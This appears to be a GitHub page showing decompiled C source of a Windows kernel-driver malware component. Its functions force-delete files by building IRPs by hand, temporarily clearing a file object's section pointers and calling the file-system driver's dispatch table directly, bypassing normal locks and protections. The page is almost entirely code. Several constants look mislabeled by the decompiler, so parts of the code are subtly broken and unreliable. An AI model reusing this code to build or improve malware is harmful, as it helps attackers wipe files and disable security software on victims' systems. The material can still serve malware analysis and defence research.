Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Driver-Malware-Component/2019-04-09-driver-functions.c

Go to file
 
 
Cannot retrieve contributors at this time
172 lines (167 sloc) 4.99 KB
Raw Blame
Open in GitHub Desktop
//////////////////////////////////////////////////////////////////
////////////////////////// FORCE DELETE FILES ////////////////////
///////////////////////////////////////////////////////////////////
signed int __stdcall sub_401000(__int16 *a1, int a2)
{
signed int result; // eax@2
int v3; // eax@12
int v4; // eax@12
UNICODE_STRING DestinationString; // [sp+0h] [bp-23Ch]@9
__int16 *v6; // [sp+8h] [bp-234h]@5
int v7; // [sp+Ch] [bp-230h]@7
int v8; // [sp+10h] [bp-22Ch]@7
int v9; // [sp+14h] [bp-228h]@1
int v10; // [sp+18h] [bp-224h]@1
__int16 *v11; // [sp+1Ch] [bp-220h]@5
__int16 *v12; // [sp+20h] [bp-21Ch]@5
__int16 v13; // [sp+26h] [bp-216h]@6
int v14; // [sp+28h] [bp-214h]@9
PVOID Object; // [sp+2Ch] [bp-210h]@9
unsigned __int16 v16; // [sp+30h] [bp-20Ch]@1
char v17; // [sp+32h] [bp-20Ah]@1
WCHAR SourceString; // [sp+34h] [bp-208h]@9
v16 = 0;
memset(&v17, 0, 0x206u);
v10 = 0;
v9 = 0;
if ( (signed int)KeGetCurrentIrql() < 2 )
{
if ( a1[1] == 58 )
{
v11 = a1;
v12 = (__int16 *)&v16;
v6 = (__int16 *)&v16;
do
{
v13 = *v11;
*v12 = v13;
++v11;
++v12;
}
while ( v13 );
if ( sub_4016A0(v16, &v7, &v8) )
{
RtlInitUnicodeString(&DestinationString, &SourceString);
v14 = irpcreate_file(&DestinationString, 0x100000, 128, 3, 1, 96, v7, v8, (int)&Object);
DbgPrint("IrpFileCreate returned [%08X]\n", v14);
if ( v14 >= 0 )
{
if ( a2 )
{
DbgPrint("Force Delete ...\n");
v10 = **((_DWORD **)Object + 5);
v9 = *(_DWORD *)(*((_DWORD *)Object + 5) + 8);
**((_DWORD **)Object + 5) = 0;
*(_DWORD *)(*((_DWORD *)Object + 5) + 8) = 0;
}
v3 = IoGetBaseFileSystemDeviceObject(Object);
v14 = irp_set_attrib(Object, v3, 128);
DbgPrint("IrpSetFileAttributes returned [%08X]\n", v14);
v4 = IoGetBaseFileSystemDeviceObject(Object);
v14 = irp_file_delete((struct _FILE_OBJECT *)Object, v4);
DbgPrint("IrpFileDelete returned [%08X]\n", v14);
if ( a2 )
{
**((_DWORD **)Object + 5) = v10;
*(_DWORD *)(*((_DWORD *)Object + 5) + 8) = v9;
}
ObfDereferenceObject(Object);
}
result = v14;
}
else
{
result = -1073741823;
}
}
else
{
result = -1073741811;
}
}
else
{
result = -1073741823;
}
return result;
}
//////////////////////////////////////////////////////////////////
/////////////// FILE DELETER VIA IRP
//////////////////////////////////////////////////////////////////
unsigned int __stdcall irp_delete_alloc(struct _FILE_OBJECT *a1, int a2)
{
unsigned int result; // eax@2
struct _KEVENT Event; // [sp+0h] [bp-28h]@1
unsigned int v4; // [sp+10h] [bp-18h]@3
int v5; // [sp+18h] [bp-10h]@3
int v6; // [sp+1Ch] [bp-Ch]@3
PIRP IRP; // [sp+20h] [bp-8h]@1
char v8; // [sp+27h] [bp-1h]@3
KeInitializeEvent(&Event, SynchronizationEvent, 0);
IRP = IoAllocateIrp(*(_BYTE *)(a2 + 48), 0);
if ( IRP )
{
IRP->MdlAddress = 0;
IRP->Flags |= IRP_MJ_QUERY_SECURITY;
IRP->RequestorMode = 0;
IRP->UserIosb = (PIO_STATUS_BLOCK)&v4;
IRP->UserEvent = &Event;
IRP->PendingReturned = 0;
IRP->Cancel = 0;
IRP->CancelRoutine = 0;
IRP->Tail.Overlay.Thread = KeGetCurrThread();
IRP->Tail.Overlay.AuxiliaryBuffer = 0;
IRP->Tail.Overlay.OriginalFileObject = a1;
IRP->AssociatedIrp.IrpCount = (LONG)&v8;
v8 = 1;
v6 = IoGetNextIrpStackLocation((int)IRP);
*(_BYTE *)v6 = IRP_MJ_SET_INFORMATION;
*(_DWORD *)(v6 + 20) = a2;
*(_DWORD *)(v6 + 24) = a1;
*(_DWORD *)(v6 + 8) = IRP_MJ_FILE_SYSTEM_CONTROL;
*(_DWORD *)(v6 + 4) = IRP_MJ_CREATE_NAMED_PIPE;
*(_DWORD *)(v6 + 12) = a1;
sub_401920((int)IRP, (int)sub_401850, 0, 1, 1u, 1);
v5 = sub_4015C0(0, a2, (int)IRP);
if ( v5 == 259 )
KeWaitForSingleObject(&Event, 0, 0, 1u, 0);
result = v4;
}
else
{
result = 0xC000009A;
}
return result;
}
////////////////////////////////////////////////////
//////////////// PROCESSEOR IRPSTACKLOCATION ///////
////////////////////////////////////////////////////
signed int __stdcall sub_4015C0(int a1, int a2, int a3)
{
char v3; // ST1B_1@1
signed int result; // eax@2
int (__stdcall *v5)(int, int); // ST10_4@5
int v6; // ST0C_4@5
int v7; // [sp+8h] [bp-Ch]@3
v3 = *(_BYTE *)(a3 + 35) - 1;
*(_BYTE *)(a3 + 35) = v3;
if ( v3 > 0 )
{
v7 = IoGetNextIrpStackLocation(a3);
*(_DWORD *)(a3 + 96) = v7;
*(_DWORD *)(v7 + 20) = a2;
if ( !a1 )
a1 = *(_DWORD *)(a2 + 8);
DbgPrint("Normal Call MJ[%d] %p\n", *(_BYTE *)v7, *(_DWORD *)(a1 + 4 * *(_BYTE *)v7 + 56));
v5 = *(int (__stdcall **)(int, int))(a1 + 4 * *(_BYTE *)v7 + 56);
__guard_check_icall_fptr(v5);
v6 = v5(a2, a3);
DbgPrint("FsCallDriver returned [%08X]\n", v6);
result = v6;
}
else
{
result = -1073741823;
}
return result;
}